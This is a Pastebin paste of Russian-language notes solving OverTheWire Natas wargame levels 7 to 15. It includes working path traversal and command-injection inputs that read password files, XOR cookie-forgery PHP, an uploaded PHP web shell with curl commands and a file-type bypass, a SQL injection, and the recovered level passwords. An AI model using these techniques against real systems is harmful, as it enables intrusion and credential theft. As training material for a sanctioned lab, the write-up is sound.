API tools faq
paste
Advertisement
Guest User

Untitled

a guest
Aug 6th, 2018
86
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 3.66 KB | None | 0 0
raw download clone embed print report
  1. lvl 7-8 просто подставил /etc/natas_webpass/natas8 после http://natas7.natas.labs.overthewire.org/index.php?page=
  2. lvl 8-9 сначала не нашел ничего интересного, но потом глянул в page source на сайте, там base64. Декодируем M2QzZDUxNjM0Mzc0NmQ0ZDZkNmMzMTU2Njk1NjMzNjIK - ничего не выходит,
  3. затем заметил другие переменные. Нагуглил что тут поможет пхп. php -a php > echo hex2bin("3d3d516343746d4d6d6c315669563362");
  4. ==QcCtmMml1ViV3b
  5. php > echo strrev("==QcCtmMml1ViV3b");
  6. b3ViV1lmMmtCcQ==
  7. php > echo base64_decode("b3ViV1lmMmtCcQ==");
  8. oubWYf2kBq
  9.  
  10. lvl 9-10 увидел скрипт, сперва пытался подсунуть команду через && затем вспомнил про сепаратор ;. В итоге "; cat /etc/natas_webpass/natas10"
  11. lvl 10-11 все то же самое, только теперь ищем везде .* /etc/natas_webpass/natas11
  12. lvl 11-12 Увидел XOR и начал гуглить. Прогнал через burp, нашел cookies. Поскольку в пхп не шарю, не сразу дошло что можно исаользовать готовый кусок в исходниках.
  13. <?php
  14.  
  15. function xor_encrypt($in) {
  16. $key = json_encode(array("showpassword"=>"no", "bgcolor"=>"#ffffff"));
  17. $text = $in;
  18. $outText = '';
  19.  
  20. // Iterate through each character
  21. for($i=0;$i<strlen($text);$i++) {
  22. $outText .= $text[$i] ^ $key[$i % strlen($key)];
  23. }
  24. return $outText;
  25. }
  26.  
  27. $decoded = xor_encrypt(base64_decode('ClVLIh4ASCsCBE8lAxMacFMZV2hdVVotEhhUJQNVAmhSEV4sFxFeaAw'));
  28. echo($decoded);
  29. ?>
  30.  
  31. На выходе получаем строчку. qw8Jqw8Jqw8Jqw8Jqw8Jqw8Jqw8Jqw8Jqw8Jqw8Jq
  32. <?php
  33.  
  34. function xor_encrypt($in) {
  35. $key = 'qw8J';
  36. $text = $in;
  37. $outText = '';
  38.  
  39. // Iterate through each character
  40. for($i=0;$i<strlen($text);$i++) {
  41. $outText .= $text[$i] ^ $key[$i % strlen($key)];
  42. }
  43. return $outText;
  44. }
  45.  
  46. $data = array( "showpassword"=>"yes", "bgcolor"=>"#ffffff");
  47. $cookie = base64_encode(xor_encrypt(json_encode($data)));
  48. print($cookie);
  49. ?>
  50. В burp подставил получившееся значение, в ответ получил пасс EDXp0pS26wLKHZy1rDBPUZk0RKfLGIR3
  51.  
  52. lvl 12-13 На первую часть квеста понадобилась помощь зала-
  53. <?php
  54. $output = shell_exec('cat /etc/natas_webpass/natas13');
  55. echo $output;
  56. ?>
  57.  
  58. Потом залил это дело curl вот так.
  59. curl -F filename=upload.php -F uploadedfile=@upload.php -u natas12:EDXp0pS26wLKHZy1rDBPUZk0RKfLGIR3 http://natas12.natas.labs.overthewire.org/
  60. curl -u natas12:EDXp0pS26wLKHZy1rDBPUZk0RKfLGIR3 http://natas12.natas.labs.overthewire.org/upload/ke23dcmj43.php
  61. jmLTY0qiPZBbaKc9341cqPQZBJv7MQbY
  62.  
  63. lvl 13-14 чуть модифицировал пхп, добавив в начало BMP. в итоге
  64. curl -F filename=upload2.php -F uploadedfile=@upload2.php -u natas13:jmLTY0qiPZBbaKc9341cqPQZBJv7MQbY http://natas13.natas.labs.overthewire.org/
  65. curl -u natas13:jmLTY0qiPZBbaKc9341cqPQZBJv7MQbY http://natas13.natas.labs.overthewire.org/upload/4m7zxzz11x.php
  66. BMPLg96M10TdfaPyVBkJdjymbllQ5L6qdl1.
  67.  
  68. lvl 14-15. смотрим сорс - mysql. Тут к гадалке не ходи - нужна инъекция.
  69. Нагуглил SQL Injection Based on ""="" is Always True.
  70. Исользуем "=" в качестве логина с паролем - выходит запрос вида
  71. SELECT * from users where username = ""="" and password = ""=""
  72. Получаем пароль.
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!